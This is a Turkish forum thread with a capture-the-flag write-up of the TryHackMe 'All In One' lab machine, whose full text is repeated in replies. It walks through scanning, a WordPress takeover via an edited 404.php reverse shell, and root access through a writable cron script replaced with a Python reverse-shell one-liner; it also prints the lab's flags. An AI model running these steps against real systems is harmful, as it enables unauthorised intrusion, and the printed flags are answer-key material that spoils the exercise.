TryHackMe | All In One

Pytang · 20 Ağu 2021

Zorluk: Medium

Merhaba, bu yazımda TryHackMe sitesinde bulunan All In One isimli makinenin çözümünü anlatacağım.

Nmap taraması yaparak başlayalım, 21, 22 ve 80 portları açık.

22: SSH
21: FTP
80: HTTP

Kod:

root@kali:nmap -sC -sV 10.10.52.170
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)
Nmap scan report for 10.10.166.147                          
Host is up (0.22s latency).                                      
Not shown: 997 closed ports                                    
PORT   STATE SERVICE VERSION                                    
21/tcp open  ftp     vsftpd 3.0.3                                
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)        
| ftp-syst:                                                
|   STAT:                                                        
| FTP server status:                                          
|      Logged in as ftp                                            
|      TYPE: ASCII                                                  
|      No session bandwidth limit                                
|      Session timeout in seconds is 300                            
|      Control connection is plain text                            
|      Data connections will be plain text                      
|      At session startup, client count was 4                        
|      vsFTPd 3.0.3 - secure, fast, stable                        
|_End of status                                                      
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                        
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)        
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)            
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)      
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                  
|_http-server-header: Apache/2.4.29 (Ubuntu)                        
|_http-title: Apache2 Ubuntu Default Page: It works                  
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel            
                                                                           
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds

Makine ip adresini adres çubuğuna yazarak websitesine giriş yapıyorum, beni default bir apache sayfası karşıladı, sayfanın kaynak kodlarına baktığımda herhangi bir ipucu bulmadım, gobuster toolunu kullanarak sitenin dizinlerini taratıyorum.

Kod:

root@kali:gobuster dir -u http://10.10.52.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.52.170
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/27 15:44:13 Starting gobuster
===============================================================
/wordpress (Status: 301)
/hackathons (Status: 200)
/server-status (Status: 403)

/hackathons dizinine giriyorum, sayfada "kahretsin sirke kokusundan ne kadar nefret ediyorum" yazıyor sayfa kaynak kodunu inceliyorum. Kaynak kodda, Keep Going anahtarı ile Vigenere kullanarak şifreyi çözebileceğimizi anlıyorum.

Encrypted : Dvc W@iyur@123
Key: KeepGoing
Decrypted : Try H@ckme@123

Diğer gizli dizinimiz ise /worpress dizine giriş yaptığımda yeni kurulmuş bir wordpress ile karşılaşıyorum, hemen WPScan toolunu kullanarak wordpressi analiz ediyorum.

Kod:

root@kali:~# wpscan --url 10.10.52.170/wordpress
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.52.170/wordpress/ [10.10.52.170]
[+] Started: Tue Aug 17 10:28:33 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.52.170/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.52.170/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.52.170/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.52.170/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.52.170/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.52.170/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.8
 | Style URL: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt

[i] User(s) Identified:

[+] elyana
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.244.196/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] reflex-gallery
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2021-03-10T02:38:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug 17 10:28:37 2021
[+] Requests Done: 2
[+] Cached Requests: 38
[+] Data Sent: 636 B
[+] Data Received: 1.074 KB
[+] Memory used: 203.102 MB
[+] Elapsed time: 00:00:03

Tarama sonucunda elyana isimli bir kullanıcının varlığını öğrenmiş oldum. Try H@ckme@123 parolasıyla elyana olarak wordpress de oturum açmayı denedim ancak başarısız oldum. Daha sonra H@ckme@123 parolasını denedim ve işe yaradı.

Şimdi yönetici olduğumuza göre şablonun 404.php sayfasını düzenleyerek reverse shell alalım. Php Reverse Shelli 404.php sayfamıza yapıştırıyorum bizden değiştirmemizi istediği bilgileri değiştiriyorum.

Terminale nc -lvnp port yazarak gelen istekleri dinlemeye başlıyorum, 404.php sayfasına gidiyorum ve reverse shelli başarıyla almış oluyorum.

user.txt dosyasını elyana'nın ana klasöründe buluyorum, ancak dosyayı okumak için yetkimiz yok.

Kod:

bash-4.4$ cd /home
cd /home
bash-4.4$ ls -la
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Oct  5  2020 .
drwxr-xr-x 24 root   root   4096 Oct  5  2020 ..
drwxr-xr-x  6 elyana elyana 4096 Oct  7  2020 elyana
bash-4.4$ cd elyana
cd elyana
bash-4.4$ ls -la
ls -la
total 48
drwxr-xr-x 6 elyana elyana 4096 Oct  7  2020 .
drwxr-xr-x 3 root   root   4096 Oct  5  2020 ..
-rw------- 1 elyana elyana 1632 Oct  7  2020 .bash_history
-rw-r--r-- 1 elyana elyana  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 elyana elyana 3771 Apr  4  2018 .bashrc
drwx------ 2 elyana elyana 4096 Oct  5  2020 .cache
drwxr-x--- 3 root   root   4096 Oct  5  2020 .config
drwx------ 3 elyana elyana 4096 Oct  5  2020 .gnupg
drwxrwxr-x 3 elyana elyana 4096 Oct  5  2020 .local
-rw-r--r-- 1 elyana elyana  807 Apr  4  2018 .profile
-rw-r--r-- 1 elyana elyana    0 Oct  5  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 elyana elyana   59 Oct  6  2020 hint.txt
-rw------- 1 elyana elyana   61 Oct  6  2020 user.txt
bash-4.4$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

Bize şifrenin sistemde gizlenmiş olabileceğini söyleyen bir ipucu "hint" var.

Kod:

bash-4.4$ cat hint.txt
cat hint.txt
Elyana's user password is hidden in the system. Find it ;)

Elyana'nın sistem dosyalarına bakıyorum burada dikkatimi private.txt dosyası çekiyor ve dosyanın içeriğine bakıyorum, dosya içeriğinde elyana kullanıcısının parolasını bize veriyor.

Kod:

bash-4.4$ find / -user elyana -type f 2>/dev/null
find / -user elyana -type f 2>/dev/null
/home/elyana/user.txt
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt
bash-4.4$ cat /etc/mysql/conf.d/private.txt
cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght

Artık elyana'nın şifresine sahip olduğumuza göre doğrudan SSH ile bağlantımızı kurabiliriz.

Kod:

kali@kali:sshpass -p "E@syR18ght" ssh [email protected]
-bash-4.4$ cat user.txt
VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259
-bash-4.4$ echo "VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259" | base64 -d
THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}

Linux ve Unix sistemlerde kullanılan crontab, belirlediğiniz bir zaman yada zaman diliminde belirlediğiniz komut, script yada uygulamanın çalışmasını sağlarsınız. Bende bu yol üzerinden gidip root olmaya çalışacağım.

Kod:

-bash-4.4$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7 root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /var/backups/script.sh

Kod:

bash-4.4$ ls -l /var/backups/script.sh
ls -l /var/backups/script.sh
-rwxrwxrwx 1 root root 73 Oct  7  2020 /var/backups/script.sh

Scripti aşağıdaki gibi değiştiriyorum. Bunu yaparken diğer taraftada Netcat ile aşağıdaki belirlediğim portu dinlemeye alıyorum.

Kod:

#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0 ıp adresiniz",istedğiniz port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Kod:

kali@kali:/data/src$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.244.196] 46344
bash: cannot set terminal process group (2639): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# cd /root
cd /root
root@elyana:~# cat root.txt
cat root.txt
VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9
root@elyana:~# cat root.txt | base64 -d
cat root.txt | base64 -d
THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}

OKUDUĞUNUZ İÇİN TEŞEKKÜRLER UMARIM YARDIMI DOKUNMUŞTUR.

The Gölge · 20 Ağu 2021

Eline emeğine sağlık çok güzel konu olmuş.

Phoenix.py · 20 Ağu 2021

Elinize Sağlık Hocam.

Gladiaus · 20 Ağu 2021

Pytang' Alıntı:

Zorluk: Medium

Merhaba, bu yazımda TryHackMe sitesinde bulunan All In One isimli makinenin çözümünü anlatacağım.

Nmap taraması yaparak başlayalım, 21, 22 ve 80 portları açık.

22: SSH
21: FTP
80: HTTP

Kod:

root@kali:nmap -sC -sV 10.10.52.170
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)
Nmap scan report for 10.10.166.147                           
Host is up (0.22s latency).                                       
Not shown: 997 closed ports                                     
PORT   STATE SERVICE VERSION                                     
21/tcp open  ftp     vsftpd 3.0.3                                 
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)         
| ftp-syst:                                                 
|   STAT:                                                         
| FTP server status:                                           
|      Logged in as ftp                                             
|      TYPE: ASCII                                                   
|      No session bandwidth limit                                 
|      Session timeout in seconds is 300                             
|      Control connection is plain text                             
|      Data connections will be plain text                       
|      At session startup, client count was 4                         
|      vsFTPd 3.0.3 - secure, fast, stable                         
|_End of status                                                       
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                         
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)         
|   256 1b:6a:36:e1:8e:b4:96:5e:c6:ef:0d:91:37:58:59:b6 (ECDSA)             
|_  256 fb:fa:db:ea:4e:ed:20:2b:91:18:9d:58:a0:6a:50:ec (ED25519)       
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))                   
|_http-server-header: Apache/2.4.29 (Ubuntu)                         
|_http-title: Apache2 Ubuntu Default Page: It works                   
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel             
                                                                            
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.57 seconds

Makine ip adresini adres çubuğuna yazarak websitesine giriş yapıyorum, beni default bir apache sayfası karşıladı, sayfanın kaynak kodlarına baktığımda herhangi bir ipucu bulmadım, gobuster toolunu kullanarak sitenin dizinlerini taratıyorum.

Kod:

root@kali:gobuster dir -u http://10.10.52.170 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.52.170
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/27 15:44:13 Starting gobuster
===============================================================
/wordpress (Status: 301)
/hackathons (Status: 200)
/server-status (Status: 403)

/hackathons dizinine giriyorum, sayfada "kahretsin sirke kokusundan ne kadar nefret ediyorum" yazıyor sayfa kaynak kodunu inceliyorum. Kaynak kodda, Keep Going anahtarı ile Vigenere kullanarak şifreyi çözebileceğimizi anlıyorum.

Encrypted : Dvc W@iyur@123
Key: KeepGoing
Decrypted : Try H@ckme@123

Diğer gizli dizinimiz ise /worpress dizine giriş yaptığımda yeni kurulmuş bir wordpress ile karşılaşıyorum, hemen WPScan toolunu kullanarak wordpressi analiz ediyorum.

Kod:

root@kali:~# wpscan --url 10.10.52.170/wordpress
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.18
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://10.10.52.170/wordpress/ [10.10.52.170]
[+] Started: Tue Aug 17 10:28:33 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.10.52.170/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://10.10.52.170/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://10.10.52.170/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.10.52.170/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.1 identified (Insecure, released on 2020-09-01).
 | Found By: Rss Generator (Passive Detection)
 |  - http://10.10.52.170/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>
 |  - http://10.10.52.170/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.5.1</generator>

[+] WordPress theme in use: twentytwenty
 | Location: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/
 | Last Updated: 2021-07-22T00:00:00.000Z
 | Readme: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/readme.txt
 | [!] The version is out of date, the latest version is 1.8
 | Style URL: http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5
 | Style Name: Twenty Twenty
 | Style URI: https://wordpress.org/themes/twentytwenty/
 | Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.5 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/themes/twentytwenty/style.css?ver=1.5, Match: 'Version: 1.5'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] mail-masta
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/mail-masta/readme.txt

[i] User(s) Identified:

[+] elyana
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://10.10.244.196/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] reflex-gallery
 | Location: http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/
 | Latest Version: 3.1.7 (up to date)
 | Last Updated: 2021-03-10T02:38:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 3.1.7 (80% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://10.10.52.170/wordpress/wp-content/plugins/reflex-gallery/readme.txt

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Aug 17 10:28:37 2021
[+] Requests Done: 2
[+] Cached Requests: 38
[+] Data Sent: 636 B
[+] Data Received: 1.074 KB
[+] Memory used: 203.102 MB
[+] Elapsed time: 00:00:03

Tarama sonucunda elyana isimli bir kullanıcının varlığını öğrenmiş oldum. Try H@ckme@123 parolasıyla elyana olarak wordpress de oturum açmayı denedim ancak başarısız oldum. Daha sonra H@ckme@123 parolasını denedim ve işe yaradı.

Şimdi yönetici olduğumuza göre şablonun 404.php sayfasını düzenleyerek reverse shell alalım. Php Reverse Shelli 404.php sayfamıza yapıştırıyorum bizden değiştirmemizi istediği bilgileri değiştiriyorum.

Terminale nc -lvnp port yazarak gelen istekleri dinlemeye başlıyorum, 404.php sayfasına gidiyorum ve reverse shelli başarıyla almış oluyorum.

user.txt dosyasını elena'nın ana klasöründe buluyorum, ancak dosyayı okumak için yetkimiz yok.

Kod:

bash-4.4$ cd /home
cd /home
bash-4.4$ ls -la
ls -la
total 12
drwxr-xr-x  3 root   root   4096 Oct  5  2020 .
drwxr-xr-x 24 root   root   4096 Oct  5  2020 ..
drwxr-xr-x  6 elyana elyana 4096 Oct  7  2020 elyana
bash-4.4$ cd elyana
cd elyana
bash-4.4$ ls -la
ls -la
total 48
drwxr-xr-x 6 elyana elyana 4096 Oct  7  2020 .
drwxr-xr-x 3 root   root   4096 Oct  5  2020 ..
-rw------- 1 elyana elyana 1632 Oct  7  2020 .bash_history
-rw-r--r-- 1 elyana elyana  220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 elyana elyana 3771 Apr  4  2018 .bashrc
drwx------ 2 elyana elyana 4096 Oct  5  2020 .cache
drwxr-x--- 3 root   root   4096 Oct  5  2020 .config
drwx------ 3 elyana elyana 4096 Oct  5  2020 .gnupg
drwxrwxr-x 3 elyana elyana 4096 Oct  5  2020 .local
-rw-r--r-- 1 elyana elyana  807 Apr  4  2018 .profile
-rw-r--r-- 1 elyana elyana    0 Oct  5  2020 .sudo_as_admin_successful
-rw-rw-r-- 1 elyana elyana   59 Oct  6  2020 hint.txt
-rw------- 1 elyana elyana   61 Oct  6  2020 user.txt
bash-4.4$ cat user.txt
cat user.txt
cat: user.txt: Permission denied

Bize şifrenin sistemde gizlenmiş olabileceğini söyleyen bir ipucu "hint" var.

Kod:

bash-4.4$ cat hint.txt
cat hint.txt
Elyana's user password is hidden in the system. Find it ;)

Elyana'nın sistem dosyalarına bakıyorum burada dikkatimi private.txt dosyası çekiyor ve dosyanın içeriğine bakıyorum, dosya içeriğinde elyana kullanıcısının parolasını bize veriyor.

Kod:

bash-4.4$ find / -user elyana -type f 2>/dev/null
find / -user elyana -type f 2>/dev/null
/home/elyana/user.txt
/home/elyana/.bash_logout
/home/elyana/hint.txt
/home/elyana/.bash_history
/home/elyana/.profile
/home/elyana/.sudo_as_admin_successful
/home/elyana/.bashrc
/etc/mysql/conf.d/private.txt
bash-4.4$ cat /etc/mysql/conf.d/private.txt
cat /etc/mysql/conf.d/private.txt
user: elyana
password: E@syR18ght

Artık elyana'nın şifresine sahip olduğumuza göre, artık doğrudan SSH ile bağlantımızı kurabiliriz.

Kod:

kali@kali:sshpass -p "E@syR18ght" ssh [email protected]
-bash-4.4$ cat user.txt
VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259
-bash-4.4$ echo "VEhNezQ5amc2NjZhbGI1ZTc2c2hydXNuNDlqZzY2NmFsYjVlNzZzaHJ1c259" | base64 -d
THM{49jg666alb5e76shrusn49jg666alb5e76shrusn}

Linux ve Unix sistemlerde kullanılan crontab, belirlediğiniz bir zaman yada zaman diliminde belirlediğiniz komut, script yada uygulamanın çalışmasını sağlarsınız. Bende bu yol üzerinden gidip root olmaya çalışacağım.

Kod:

-bash-4.4$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
25 6  * * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6  * * 7 root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6  1 * * root  test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*  *    * * *   root    /var/backups/script.sh

Kod:

bash-4.4$ ls -l /var/backups/script.sh
ls -l /var/backups/script.sh
-rwxrwxrwx 1 root root 73 Oct  7  2020 /var/backups/script.sh

Scripti aşağıdaki gibi değiştiriyorum. Bunu yaparken diğer taraftada Netcat ile aşağıdaki belirlediğim portu dinlemeye alıyorum.

Kod:

#!/bin/bash
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("tun0 ıp adresiniz",istedğiniz port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

Kod:

kali@kali:/data/src$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.8.50.72] from (UNKNOWN) [10.10.244.196] 46344
bash: cannot set terminal process group (2639): Inappropriate ioctl for device
bash: no job control in this shell
root@elyana:~# cd /root
cd /root
root@elyana:~# cat root.txt
cat root.txt
VEhNe3VlbTJ3aWdidWVtMndpZ2I2OHNuMmoxb3NwaTg2OHNuMmoxb3NwaTh9
root@elyana:~# cat root.txt | base64 -d
cat root.txt | base64 -d
THM{uem2wigbuem2wigb68sn2j1ospi868sn2j1ospi8}

OKUDUĞUNUZ İÇİN TEŞEKKÜRLER UMARIM YARDIMI DOKUNMUŞTUR.

yaralı bir konu iyi forumlar

The Serum · 20 Ağu 2021

Eline sağlık Pytang

darkswan · 20 Ağu 2021

Pytang' Alıntı:

Zorluk: Medium

Merhaba, bu yazımda TryHackMe sitesinde bulunan All In One isimli makinenin çözümünü anlatacağım.

Nmap taraması yaparak başlayalım, 21, 22 ve 80 portları açık.

22: SSH
21: FTP
80: HTTP

Kod:

root@kali:nmap -sC -sV 10.10.52.170
Starting Nmap 7.80 ( https://nmap.org ) at 2020-12-09 15:39 EST
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 15:39 (0:00:03 remaining)
Nmap scan report for 10.10.166.147                          
Host is up (0.22s latency).                                      
Not shown: 997 closed ports                                    
PORT   STATE SERVICE VERSION                                    
21/tcp open  ftp     vsftpd 3.0.3                                
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)        
| ftp-syst:                                                
|   STAT:                                                        
| FTP server status:                                          
|      Logged in as ftp                                            
|      TYPE: ASCII                                                  
|      No session bandwidth limit                                
|      Session timeout in seconds is 300                            
|      Control connection is plain text                            
|      Data connections will be plain text                      
|      At session startup, client count was 4                        
|      vsFTPd 3.0.3 - secure, fast, stable                        
|_End of status                                                      
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:                                                        
|   2048 e2:5c:33:22:76:5c:93:66:cd:96:9c:16:6a:b3:17:a4 (RSA)        
